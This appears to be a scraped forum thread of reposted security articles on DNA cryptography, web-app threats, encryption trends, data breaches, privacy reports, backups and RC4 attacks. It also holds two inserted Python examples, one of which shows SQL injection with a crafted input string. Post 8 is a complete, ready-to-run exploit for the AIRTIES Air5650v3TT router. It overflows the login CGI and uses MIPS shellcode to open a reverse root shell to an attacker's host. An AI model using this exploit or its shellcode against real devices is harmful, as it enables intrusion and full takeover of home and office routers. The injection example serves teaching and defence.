are the building blocks of DNA happen without any outside power source. There is no comparison to the power requirements of conventional computers. Multiple DNA crypto algorithms have been researched and published, like the Symmetric and Asymmetric Key Crypto System using DNA, DNA Steganography Systems, Triple Stage DNA Cryptography, Encryption algorithms inspired by DNA, and Chaotic computing. 
DNA Cryptography can be defined as a technique of hiding data in terms of DNA sequence. In the cryptographic technique, each letter of the alphabet is converted into a different combination of the four bases which make up the human deoxyribonucleic acid (DNA). DNA cryptography is a rapidly emerging technology which works on concepts of DNA computing. DNA stores a massive amount of information inside the tiny nuclei of living cells. It encodes all the instructions needed to make every living creature on earth. The main advantages of DNA computation are miniaturization and parallelism of conventional silicon-based machines. For example, a square centimeter of silicon can currently support around a million transistors, whereas current manipulation techniques can handle to the order of 10^20 strands of DNA. DNA, with its unique data structure and ability to perform many parallel operations, allows one to look at a computational problem from a different point of view. A simple mechanism of transmitting two related messages by hiding the message is not enough to prevent an attacker from breaking the code. DNA Cryptography can have special advantage for secure data storage, authentication, digital signatures, steganography, and so on. DNA can also be used for producing identification cards and tickets. “Trying to build security that will last 20 to 30 years for a defense program is very, very challenging,” says Benjamin Jun, vice president and chief technology officer at Cryptography Research. Multiple studies have been carried out on a variety of biomolecular methods for encrypting and decrypting data that is stored as a DNA. With the right kind of setup, it has the potential to solve huge mathematical problems. It’s hardly surprising then, that DNA computing represents a serious threat to various powerful encryption schemes. Various groups have suggested using the sequence of nucleotides in DNA (A for 00, C for 01, G for 10, T for 11) for just this purpose. 
One idea is to not even bother encrypting the information but simply burying it in the DNA so it is well hidden, a technique called DNA steganography. DNA Storage of Data has a wide range of capacity: Medium of Ultra-compact Information storage: Very large amounts of data that can be stored in compact volume. A gram of DNA contains 10^21 DNA bases = 10^8 Terabytes of data. A few grams of DNA may hold all data stored in the world. Conclusion DNA cryptography is in its infancy. Only in the last few years has work in DNA computing seen real progress. DNA cryptography is even less well studied, but ramped up work in cryptography over the past several years has laid good groundwork for applying DNA methodologies to cryptography and steganography. Researches and studies are being carried out to identify a better and unbreakable cryptographic standard. A number of schemes have been proposed that offer some level of DNA cryptography, and are being explored. At present, work in DNA cryptography is centered on using DNA sequences to encode binary data in some form or another. Though the field is extremely complex and current work is still in the developmental stages, there is a lot of hope that DNA computing will act as a good technique for Information Security. References An Overview of Cryptography Handbook of Applied Cryptography Encryption vs. Cryptography - What is the Difference? Traditional Cryptology Problems - HowStuffWorks Understanding encryption and cryptography basics https://www.digicert.com/TimeTravel/math.htm http://securityaffairs.co/wordpress/33879/security/dna-cryptography.html http://research.ijcaonline.org/volume98/number16/pxc3897733.pdf http://searchsecurity.techtarget.com/answer/How-does-DNA-cryptography-relate-to-company-information-security http://www.technologyreview.com/view/412610/the-emerging-science-of-dna-cryptography/ Source
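The two-bit nucleotide mapping quoted in the post above (A for 00, C for 01, G for 10, T for 11), worked through as an added Python example that is not part of the original post. The mapping by itself is a public encoding; the XOR pad used here to supply secrecy is an assumption of this example, as are all function names.

```python
import secrets

# Mapping quoted in the post: A=00, C=01, G=10, T=11.
BASES = "ACGT"
BASE_TO_BITS = {base: value for value, base in enumerate(BASES)}


def bytes_to_dna(data: bytes) -> str:
    """Encode each byte as four bases, most significant bit pair first."""
    strand = []
    for byte in data:
        for shift in (6, 4, 2, 0):
            strand.append(BASES[(byte >> shift) & 0b11])
    return "".join(strand)


def dna_to_bytes(strand: str) -> bytes:
    """Decode a strand produced by bytes_to_dna, rejecting malformed input."""
    if len(strand) % 4:
        raise ValueError("strand length must be a multiple of 4 bases")
    out = bytearray()
    for i in range(0, len(strand), 4):
        byte = 0
        for base in strand[i:i + 4]:
            if base not in BASE_TO_BITS:
                raise ValueError(f"invalid base {base!r}")
            byte = (byte << 2) | BASE_TO_BITS[base]
        out.append(byte)
    return bytes(out)


def xor_pad(data: bytes, pad: bytes) -> bytes:
    """One-time-pad style XOR; the pad must be random, secret and used once."""
    if len(pad) != len(data):
        raise ValueError("pad must be exactly as long as the data")
    return bytes(d ^ p for d, p in zip(data, pad))


def encrypt_to_dna(plaintext: bytes, pad: bytes) -> str:
    """Secrecy comes from the pad; the base mapping only changes the alphabet."""
    return bytes_to_dna(xor_pad(plaintext, pad))


def decrypt_from_dna(strand: str, pad: bytes) -> bytes:
    return xor_pad(dna_to_bytes(strand), pad)


if __name__ == "__main__":
    message = b"Hi"  # constructed sample input
    print("plain encoding :", bytes_to_dna(message))   # anyone can reverse this
    pad = secrets.token_bytes(len(message))
    strand = encrypt_to_dna(message, pad)
    print("padded encoding:", strand)
    print("recovered      :", decrypt_from_dna(strand, pad))
```

Anyone who knows the mapping can reverse `bytes_to_dna`, so an unkeyed strand hides nothing from an informed reader.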
  6. Web applications are critical to the enterprise infrastructure. Companies rely on them to communicate with partners, clients, shareholders and others, as well as store corporate information, share files, and conduct a host of other operations. These applications are convenient, as their functionality is dependent upon online browsers. However, web applications may have security weaknesses that can expose a single user or the entire organization to multiple threats. Cyber criminals have been focusing on the web in recent years and the trend continues to grow. Cyber attacks are becoming high-profile, getting more sophisticated, and increasing in frequency. According to the Gartner Group, 75 percent of cyber attacks and web security violations occur through Internet applications. Regardless of the development of the application being outsourced or in-house, adversaries examine the infrastructure of an application and its design to identify potential vulnerabilities that can be exploited. High-risk threats to web applications In particular, enterprises need to be aware of the following threats to web applications. The focus is on the wide repertoire of techniques adversaries use to compromise web applications and sites: DoS (Denial of Service): DoS attacks involve hackers overwhelming a web application with multiple requests for information, slowing down the operation of a website or entirely taking it down. A multi-source attack is considered a distributed DoS or DDoS, which routes the malicious traffic through a bigger number of servers. Attackers may also upload dangerous files, which may be downloaded by employees or processed in a corporate environment. Cross-site scripting (XSS): This is a common vulnerability that exploits web application weaknesses to attack users. The attack involves hackers passing data that’s crafted to masquerade legitimate functionality; without proper validation of data, malicious code is transferred to the web browser. 
In many cases, cyber criminals craft attacks via JavaScript, but attacks may also include Flash, HTML, or another code executed by web browsers. Cross-site scripting enables hackers to steal credentials, hijack sessions, or redirect users to malicious sites. SQL injection: These are random attacks that target applications with weak security to inject malware to extract data or aid virus distribution. These two scenarios are often a result of poor programming. Successful attacks involve hackers modifying the logic of SQL statements against databases. The application, in most cases, builds dynamic query statements, enabling malicious users to work with the data. Consequences can include data corruption, account compromise, or even a complete host takeover. Parameter & buffer manipulation: Websites often use URL parameters to pass information between web pages. Hackers can take advantage of this process and rewrite parameters in malicious ways. They may also manipulate buffers (a small storage allocated for data), and overload them so that additional data overwrites data in other areas. Hackers may also override data with their own malicious code. Security policy template Security policies are, in effect, a strategy to protect web applications and ensure availability at all times. These generally include steps to identify responsibilities, predict threat vectors, and determine prevention & mitigation methodologies. It is essential to define rules for ensuring high availability of applications and minimizing weaknesses. Access and control mechanisms It is common for web applications to lack sufficient authorization checks for people attempting to access their resources. In a secure environment, there should be both role based and user access controls. Organizations should ensure that users can’t bypass ACLs by navigating directly to a file or page. This can be done by setting ACLs to default grant or deny access to authorized users and roles. 
The IT team can also utilize vetted frameworks and libraries. Access and control should be kept separate, and custom authorization routines should be avoided, as they make the authentication of all necessary channels more challenging. Delineation of responsibilities Never assume there are predefined responsibilities to access files and data stored by web applications. A lot of testing and experience goes into vetted frameworks, encryption algorithms and libraries, so make sure there is a clear description of responsibilities for every user at every possible step. The more default the set of responsibilities, the more difficult it will become to secure the application. Roles and access control are not just for developers, but for all people involved in using web applications. You need to have some delineation of roles with different levels of access for each user. While every organization’s application development program will be different, responsibilities can be handled in different ways or added in different places, and still be effective. Security resources and tools A well-defined policy template includes the use of encryption algorithm for web applications. Users have to determine the data that is valuable enough for encryption, and identify vulnerabilities through threat modeling. Some resources may have to be sacrificed to secure highly sensitive data. Implementations like a web application firewall will safeguard enterprise applications and websites from any cyber threat, so you can avoid costly downtime and data breach attacks. Enterprises are recommended to look for PCI-certified WAF as it protects against Cross-site scripting, SQL injections, and other threats. Some offerings include custom security rules that let you enforce security policies efficiently while eliminating false positives. New solutions are also using crowdsourcing techniques to protect applications with collective knowledge about the modern threat landscape. 
Threat information is aggregated using big data analytics. Disaster recovery and emergency mechanisms Disaster recovery solutions are required for immediate response to high-risk situations and mitigation strategies must be deployed to limit exposure from an attack. Disaster recovery should be allowed to bypass security assessments and address the risk before a proper assessment can be carried out. Patch releases, on the other hand, are subjected to appropriate level assessment based on the threats to the application architecture and/or functionality. CIOs are the personnel in charge of disaster recovery initiatives. Emergency mechanisms may include steps to take the application off-the-web or stop functionality release into the live environment if multiple threats increase the risk to unacceptable levels. Emergencies should be addressed in a point/patch release unless other mitigation strategies limit exposure. Credentials after patching may be temporarily stored outside of the webroot until the application infrastructure is tested in updated areas of the application environment. Other measures When web applications feature hard-coded credentials, the user can store credentials in the form of hashes to improve security in case the database or the configuration files get breached. Strict ACLs can also be deployed to protect credentials. Enterprises should also use a whitelist of acceptable input commands. If applications are configured to construct SQL queries, but include vulnerabilities that enable hackers to modify these queries, then it is beneficial to avoid dynamic queries, quote arguments, and special characters. The database inputs should be sanitized in general, and there should be strict rules for input validation. 
Compliance measures and business benefits When it comes to compliance, users who violate this policy should be subjected to a hearing, which may be concluded with a disciplinary action such as termination of employment, depending on the nature of violation. Everyone accessing web applications should undergo assessment as a requirement of a security policy and adhere to the policy unless exempted in certain circumstances. The infrastructure of all applications should be updated to include the security control process. Any web applications that lack appropriate security controls should be taken down for formal assessment, and should not make their way online until the CIO clears them for security integration. All these measures will result in business benefits, such as no loss of productivity during downtimes, and ensure SLAs are met. An enterprise with highly secured web applications will also attract more clients, as they would be better able to protect sensitive customer information. Organizations following the security policy template would also enjoy technical benefits such as high availability and security of data. Both these factors are likely to improve client-wide and industry wide reputation. Lastly, the policy will bridge the gap between good IT practices and enterprise security compliance. Source
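The "Other measures" advice in the post above (avoid dynamic queries, validate input against a whitelist, store credentials as hashes), shown as an added Python example that is not part of the original post. The table layout, the username pattern, the PBKDF2 parameters and the crafted input are all constructed for this illustration.

```python
import hashlib
import hmac
import re
import secrets
import sqlite3

# Allow-list for usernames (an assumed policy for this example).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")
PBKDF2_ROUNDS = 200_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, slow hash so a leaked table does not reveal the passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = secrets.token_bytes(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("alice", salt, hash_password("correct horse", salt)))
    return db


def user_exists_dynamic(db: sqlite3.Connection, name: str) -> bool:
    """Weak form: input is pasted into the SQL text and can change its logic."""
    query = "SELECT COUNT(*) FROM users WHERE name = '" + name + "'"
    return db.execute(query).fetchone()[0] > 0


def user_exists_parameterized(db: sqlite3.Connection, name: str) -> bool:
    """Corrected form: the value is bound as data and never parsed as SQL."""
    row = db.execute("SELECT COUNT(*) FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] > 0


def valid_username(name: str) -> bool:
    """Whitelist validation, applied in addition to parameter binding."""
    return USERNAME_RE.fullmatch(name) is not None


def check_login(db: sqlite3.Connection, name: str, password: str) -> bool:
    if not valid_username(name):
        return False
    row = db.execute("SELECT salt, pw_hash FROM users WHERE name = ?",
                     (name,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    # Constant-time comparison of the recomputed hash with the stored one.
    return hmac.compare_digest(hash_password(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    crafted = "nobody' OR '1'='1"  # constructed input that rewrites the WHERE clause
    print("dynamic query, crafted input      :", user_exists_dynamic(db, crafted))
    print("parameterized query, crafted input:", user_exists_parameterized(db, crafted))
    print("whitelist accepts crafted input   :", valid_username(crafted))
    print("login with correct password       :", check_login(db, "alice", "correct horse"))
```

The dynamic query reports a match for a user that does not exist, while the bound parameter is compared as a literal string and the whitelist rejects it before it reaches the database.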
  7. When mega-retailer Target was the victim of a data breach during the 2013 holiday season, more than 70 million customers learned that their personal information, including email addresses and credit card numbers, had possibly been compromised. However, there was one small bright spot in the torrent of bad news: Target reported that the PIN numbers for compromised debit cards were encrypted, and therefore useless to the criminals who now had access to them. While that might have been little consolation to those customers who had to spend time locking down their accounts, to Target, it was a major victory in an otherwise bleak situation. Because the retailer did employ encryption to protect certain vital data, they were granted “Safe Harbor” from certain reporting requirements and more importantly, major fines, as a result of the breach. The Target data breach, and the others that have occurred since at retailers like Nordstrom and Home Depot, only serve to underscore the importance of encryption as part of a data protection strategy. While prior to these breaches, businesses that collect customer payment information, including credit and debit card numbers, were required by the Payment Card Industry Data Security Standards (PCI DSS) to encrypt data, many other businesses that store and transmit data via networks had less defined rules regarding encryption. However, that’s all changing. Encryption, once viewed as “extra” protection by many, has become a priority in the ongoing quest to secure data. 3 Top Trends in Data Encryption The fact that encryption has become a bigger priority in the last year is not the only change in the data security universe. In fact, the new emphasis on encryption itself has led to some significant trends. Among them: 1. Key Management Has Become More Complex One of the leading causes of data breaches is the inappropriate management of credentials, and encryption key management falls squarely under the umbrella of credential management. 
As more enterprises adopt encryption as part of their security protocol, the number of keys that need to be managed has also increased. Vendors that offer encryption as a service are growing more reluctant to be responsible for customer keys, while businesses employing encryption are also finding challenges in maintaining separation between the keys and the encrypted data. 2. Compliance Standards Are Changing While certain regulations, including the PCI DSS and HIPAA already required encryption as a minimum security standard, those regulations are expanding and becoming more stringent. The definition of “sensitive data” is expanding all the time, and organizations that fail to comply with the regulatory standards of their industry could face serious consequences. Many are choosing to err on the side of caution, and employing advanced encryption ahead of regulatory changes. 3. Expectations for Encryption Are Evolving One of the primary reasons that many businesses have resisted encryption — especially small businesses — is that encryption has often been viewed as a complex and cumbersome function. Some older (read: a decade or more) encryption solutions did present some hurdles to users, but today’s virtualization security solutions present a seamless alternative. In short, modern encryption technology protects data without any effect on application functionality. Developers are also working toward homomorphic encryption to make the analysis of Big Data more thorough. Currently, most cloud based data analysis tools are not able to work with encrypted data. Businesses must either take the risk of working with unencrypted data in the cloud, or develop their own analytical applications, which increases expense. Homomorphic encryption, however, allows encrypted data to be analyzed just as it would if it were unencrypted. 
This allows businesses to not only tap into the power of Big Data more securely, it also presents opportunities to analyze data from multiple sources at once, without exposing potentially sensitive information. Even just a few short years ago, encryption was often viewed as a “bonus” security measure, something that enterprises could choose to employ. Believed to be the realm of government agencies and hackers, it was often reserved for the most sensitive data only, and considered unnecessary for the average user. With so much data being shared online, and with the explosive growth of cloud computing, though, encryption has become as commonplace as antivirus protection and firewalls. As adoption grows, expect to see more changes in encryption standards and security management going forward. Source
  8. #!/usr/bin/env python ##################################################################################### # Exploit for the AIRTIES Air5650v3TT # Spawns a reverse root shell # Author: Batuhan Burakcin # Contact: batuhan@bmicrosystems.com # Twitter: @batuhanburakcin # Web: [url]http://www.bmicrosystems.com[/url] ##################################################################################### import sys import time import string import socket, struct import urllib, urllib2, httplib if __name__ == '__main__': try: ip = sys.argv[1] revhost = sys.argv[2] revport = sys.argv[3] except: print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0] host = struct.unpack('>L',socket.inet_aton(revhost))[0] port = string.atoi(revport) shellcode = "" shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd" shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff" shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0" shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\xaf\xae\xff\xe4" shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1] shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3] shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27" shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27" shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c" shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f" shellcode += 
"\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec" shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab" shellcode += "\x01\x01\x01\x0c" data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48 pdata = { 'redirect' : data, 'self' : '1', 'user' : 'tanri', 'password' : 'ihtiyacmyok', 'gonder' : 'TAMAM' } login_data = urllib.urlencode(pdata) #print login_data url = 'http://%s/cgi-bin/login' % ip header = {} req = urllib2.Request(url, login_data, header) rsp = urllib2.urlopen(req) Source
  9. Snapchat, the social network known for its disappearing messages, released its first transparency report Thursday showing hundreds of requests from US and foreign law enforcement agencies. Between November 1 and February 28, Snapchat said it received 375 requests from US law enforcement officials, and produced at least some data in 92 percent of those cases. "While the vast majority of Snapchatters use Snapchat for fun, it's important that law enforcement is able to investigate illegal activity," Snapchat said in a blog post. "We want to be clear that we comply with valid legal requests." The requests were mostly in the form of subpoenas, warrants or court orders, along with a smaller number of emergency requests. Outside the US, Snapchat received 28 requests and produced data in six of those cases. The requests came from Britain, Belgium, France, Canada, Ireland, Hungary and Norway. Snapchat joins other major tech firms that have released similar data including Google, Yahoo, Facebook, Twitter and Microsoft. Like most of its peers, Snapchat said it opposed efforts to give law enforcement special access through "backdoors." "Privacy and security are core values here at Snapchat and we strongly oppose any initiative that would deliberately weaken the security of our systems," the blog posting said. "We're committed to keeping your data secure and we will update this report bi-annually." The report did not include data on US national security requests, which may only be released after a six-month delay. "Even though Snapchat has promoted user privacy and autonomy since its founding, we've only recently been able to systematically track and report requests for user information," the company said. It said it will publish more details in July on government requests and demands to remove content. Snapchat last year reportedly rejected a $3-billion takeover by Facebook and later was valued at some $10 billion following a private equity round of investment. 
Snapchat has not disclosed key financial information or numbers of users but some analysts say it is used by as many as 100 million people or more. Snapchat rocketed to popularity, especially among teens, after the initial app was released in September 2011. Created by then Stanford University students, the app allows the sending of messages that disappear shortly after being viewed. Sursa: Snapchat Shows Data Requests in Transparency Report | SecurityWeek.Com
  10. Uber insisted it had not been hacked following the discovery that log-in information for thousands of the car-sharing service's users is widely available on the online black market. Motherboard confirmed last week that several dark Web forums — hidden from the regular internet using the online anonymity software Tor — were selling working log-ins for Uber for as little as $1. Uber denies the information was taken from its own servers, however. “We investigated and found no evidence of a breach,” the company said in a statement. “Attempting to fraudulently access or sell accounts is illegal and we notified the authorities about this report.” An Uber log-in can not only be used to rack up fraudulent trips, but would also give access to the user’s travel history, exposing home addresses. An account also contains partial credit card information. Uber said the log-ins might have been lifted by either breaking weak passwords, or by trying passwords exposed in other data breaches. “This is a good opportunity to remind people to use strong and unique usernames and passwords, and to avoid reusing the same credentials across multiple sites and services,” Uber said. The company’s data security has made headlines in recent months. In late February, it came out that the personal information of up to 50,000 drivers had been compromised during a May 2014 breach. The 2014 hack is not related to the current rash of Uber log-ins for sale, the company said. Source
  11. Facebook is in violation of EU data laws owing to its overly complex privacy policies and persistent tracking of users, even if they have opted out of such systems. This was the key claim in a report by researchers at the University of Leuven and the Free University of Brussels on behalf of the Belgian Privacy Commission. “Our analysis indicates [that] Facebook is acting in violation of European law,” the report said. Specifically, the researchers are concerned that almost all data tracking and monitoring done by Facebook, such as for advertising purposes or gathering location data, is done without giving users adequate control over their privacy. “Its current default settings with regards to behavioural profiling and advertising (essentially 'opt-out') remain problematic,” the report said. “According to the Article 29 Working Party, consent cannot be inferred from the data subject’s inaction with regard to behavioural marketing. “As a result, Facebook’s opt-out system for advertising does not meet the requirements for legally valid consent. In addition, opt-outs for 'Sponsored Stories' or collection of location data are simply not provided.” The way Facebook combines data from its other services, specifically Instagram and WhatsApp, to build a more complete picture of a user was also cited as another way in which Facebook does not adhere to EU privacy and data laws. “Facebook only offers an opt-out system for its users in relation to profiling for third-party advertising purposes. The current practice does not meet the requirements for legally valid consent,” the report said. The report also criticised Facebook for “leveraging its dominant position” in the social networking market to effectively force users to accept its conditions. “The choices Facebook offers to its users are limited. For many data uses, the only choice for users is to simply 'take it or leave it'. 
If they do not accept, they can no longer use Facebook and may miss out on content exclusively shared on this platform,” the researchers said. Another interesting area raised in the report relates to the rights, or lack of, that Facebook provides to delete an account and have all data removed from the firm's databases. "Facebook fails to provide (sufficient) granularity in exercising data subject’s rights. For example, the right to erasure can only be exercised with regard to the user’s profile and only relates to self-posted content," it said. V3 contacted Facebook for its response to the report but had received no reply at the time of publication. The damning allegations come just a few months after Facebook updated its terms and conditions in an effort to make it easier for people to "take charge" of how their data is used on the site. Source
  12. 31 March is World Backup Day, a chance for us all to avoid being April Fools by making sure we have secure backups of all our most important data. On last year's Backup Day, we provided a rundown of the most basic and important steps you can take to ensure your files can be retrieved in the event of a disaster. Most physical storage media, from hard drives and USB flash drives to CDs and DVDs, are vulnerable to damage from flood, fire, or sudden impact (sometimes even simply dropping them on the floor). That's not to mention having your laptop stolen, losing a USB drive, or indeed corruption or accidental deletion, so having a single copy of your important files is never a good idea. Of course, keeping a second copy right next to the computer holding your main copy is not going to help in the event of a fire or burglary. As a result, a range of online backup services has emerged in recent years, providing handy options for simple, low-cost backups that are shielded from many of the risks of copies stored in your home or office. There are some issues to consider here too, though, especially in terms of privacy. Depending on the service you use and the location of its servers, your data could be open to the prying eyes of government agencies and even hackers, so it's advisable to use strong encryption of your own if you need to upload data to a cloud service while keeping its content private. Make sure access is controlled with strong passwords and 2-factor authentication to keep unwanted people out of your account, and don't forget to pay the subscription fee, as your data may automatically be deleted if your account expires. The ransomware threat When we last covered World Backup Day, ransomware was a relatively new addition to the range of headaches facing us, with CryptoLocker hitting headlines around the world in late 2013. 
Since then ransomware has become a popular money-making tactic for cybercriminals, evolving multiple variants including CryptoWall and CryptoDefense, and going after iPhone users, gamers and companies' customer databases. Of course, ransomware wasn't invented with CryptoLocker – the AIDS Information Trojan, created in late 1989, was probably the first example of malware that scrambled your data and demanded money to decrypt it. But the inclusion of properly-implemented cryptography in CryptoLocker and its followers - rendering the files it targets for all practical purposes irretrievable without paying up - has turned it from an annoyance into a calamity for those affected. At least, that is, for those without proper backups. Any business should include regular and secure backups as one of its most basic processes, and everyday home users are steadily learning that this applies to them too. However, as we've seen, even in settings where you would expect secure computing practices, they're not always in place, with organisations from police departments to entire school districts finding their data locked up and held to ransom. Malicious encryption Having malicious software running on your computer, encrypting files at will, adds a further complication to the backup process. Many ransomware variants don't just scramble your C: drive. They look for any device that can be accessed as if it were a disk drive, including USB drives, network shares and even cloud-based storage, if it is mounted as a directly-accessible network drive. This could result in the double nightmare of having your carefully stowed backups also encrypted and locked up. 
There's also a risk with more basic scheduled backup systems that your local files could get encrypted, then backed up, overwriting existing "clean" backups so that even if you restore your backup, you are still stuck with scrambled files. Stepped backups So, there's a strong argument for some sort of stepped approach to backing up, using at least two separate backup devices and updating one or the other alternately on a regular basis, checking the integrity of the data stored on them each time. That way, you're reasonably sure you won't lose more than a few days or weeks' worth of data, even in the case of the most devious and long-lasting infection. The main point of World Backup Day is to make sure those of us who have yet to make any sort of effort to secure our data make a start and take those first basic precautions. If you haven't yet backed up any of your stuff, now would be a really good time to get moving. Source: https://nakedsecurity.sophos.com
  13. Do you realize how often your smartphone is sharing your location data with various companies? It is more than 5000 times in just two weeks. That is a little shocking, but true! A recent study by the security researchers from Carnegie Mellon reveals that a number of smartphone applications collect your location-related data — a lot more than you think. The security researcher released a warning against the alarming approach: "Your location [data] has been shared 5,398 times with Facebook, GO Launcher EX, Groupon and seven other [applications] in the last 14 days." During their study, researchers monitored 23 Android smartphone users for three weeks. First Week - Participants were asked to use their smartphone apps as they would normally do. Second Week - An app called App Ops was installed to monitor and manage the data those apps were using. Third Week - The team of researchers started sending a daily “privacy nudge” alert that would ping participants each time an app requested location-related data. Researchers concluded: Some apps for Android are tracking users' movements every three minutes. Some apps for Android are attempting to collect more data than needed. Groupon, a deal-of-the-day app, requested one participant's coordinates 1,062 times in two weeks. Weather Channel, a weather report app, asked for device location an average of 2,000 times, or every 10 minutes. The participants were unaware of how closely they were being tracked by different apps, and many were surprised by the end results. Another participant wrote, "The number (356 times) was huge, unexpected." The research team found that privacy managing software helped manage access to data. When the members granted access to App Ops, they collectively checked their App permissions 51 times and restricted 272 permissions on 76 different apps. Just one of the participants failed to review permissions. 
As per user mentality, once the participants had made changes to the app permissions, they hardly looked at them after a few days. With the help of the App Ops privacy app, in the span of eight days, the participants collectively reviewed app permissions 69 times, blocking 122 additional permissions on about 47 different apps. Ultimately, the team believes that if a user began getting the privacy nudges on a daily basis, they'll definitely go back to their privacy settings and restrict apps that are tracking users more closely. Source
  14. The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols. Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic. Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream. It required attackers to view more than 17 billion (2^34) separate encryptions of the same data. That was a high bar, particularly given that the attack revealed only limited amounts of plaintext. Still, since the researchers demonstrated the attack could decrypt HTTPS-protected authentication cookies used to access user e-mail accounts, Google and other website operators immediately took notice. Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (2^26) encryptions, a two-order of magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail. Bar-mitzvah attack A second exploit targeting RC4 was devised by researchers from security firm Imperva and was presented Thursday at the Black Hat security conference in Singapore. 
The attack uses new ways to exploit the "invariance weakness," a key pattern in RC4 keys that can leak plaintext data into the ciphertext under certain conditions. The weakness first came to light in 2001, and led to the fatal exploit against wired equivalent privacy technology used to encrypt Wi-Fi networks. Given the age of the invariance weakness, Imperva researchers are dubbing their new exploit the "bar-mitzvah attack." "The security of RC4 has been questionable for many years, in particular its initialization mechanisms," Imperva researchers wrote in a research paper that accompanied Thursday's Blackhat talk. "However, only in recent years has this understanding begun translating into a call to retire RC4. In this research, we follow [the 2013 RC4 researchers] and show that the impact of the many known vulnerabilities on systems using RC4 is clearly underestimated." The bar-mitzvah attack requires adversaries to sample about one billion RC4 encryptions to infer a credit card number, password, or authentication cookie key. The known weakness exploited involves a flaw found in one out of every 16 million (2^24) RC4 keys that leads to "structures" in the "least significant bits" of the keystream. The attack is subject to a significant limitation, however, since the leaky plaintext is contained only in the first 100 bytes of ciphertext. Despite the limitation and the challenge of sampling so many encryptions, the attack may be enough to drastically reduce the cost of doing an exhaustive attack that guesses passwords, credit card numbers or similar data. Rather than try every possible combination, the bar-mitzvah attack allows attackers to hone in on a much smaller number of candidates. The growing body of attacks that defeat SSL and TLS encryption are only one threat facing the system millions of Internet users rely on to encrypt sensitive data and authenticate servers. 
In 2011 hackers broke into Netherlands-based certificate authority DigiNotar and minted counterfeit credentials for Google and other sensitive Web properties. Earlier this week, shoddy practices at an intermediate CA known as MCS Holdings allowed its customers to obtain unauthorized certificates for several Google addresses. Poor practices on the part of Microsoft also led to the discovery of misissued certificates, on two separate occasions. “RC4 must die” The TLS protocol has two significant phases. The first "handshaking" phase uses asymmetric encryption to negotiate the symmetric encryption keys to be used by an e-mail or Web server and the connecting end user. During the later "record" phase, the parties use the agreed-upon keys to encrypt data using either the AES block cipher or RC4 stream cipher. The two attacks unveiled this month, combined with the exploit disclosed in 2013, are a strong indication the security of RC4 can't be counted on for much longer and should be phased out in favor of alternative algorithms. Retiring RC4 is proving a challenging proposition. A 2011 attack known as BEAST—short for Browser Exploit Against SSL/TLS—targets an encryption mode known as CBC, or cipher block chaining, which is present in most algorithms except for RC4. After BEAST was demonstrated to pose a credible threat to TLS-protected data in transit, many security experts recommended website operators opt for RC4 to blunt the threat. That advice is no longer sound, now that RC4 is under attack, too. Imperva researchers say Web app developers should strongly consider disabling RC4 in all their TLS configurations and tech-savvy end users should disable RC4 in their browser settings. In February, the Internet Engineering Task Force submitted a request for comments prohibiting the use of RC4 cipher. Use of RC4 has shrunk from about half of all TLS traffic in 2013 to about 30 percent today, but eliminating it altogether may take years. 
